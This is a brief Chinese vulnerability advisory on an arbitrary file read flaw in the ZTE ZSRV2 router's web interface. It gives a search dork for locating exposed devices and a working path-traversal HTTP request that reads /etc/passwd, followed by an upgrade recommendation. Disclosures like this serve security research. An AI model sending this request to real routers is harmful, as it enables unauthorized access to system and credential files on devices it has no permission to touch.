中兴-ZSRV2路由器-任意文件读取
中兴-ZSRV2路由器-任意文件读取
文章目录
- 中兴-ZSRV2路由器-任意文件读取
- 免责声明
- 漏洞描述
- 搜索语法
- 漏洞复现
- 修复建议
免责声明
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任
漏洞描述
该路由器管理页面的存在任意文件读取漏洞
搜索语法
title=“ZSRV2路由器Web管理系统”
漏洞复现
GET /../../../../../../../../etc/passwd HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
修复建议
升级到最新版本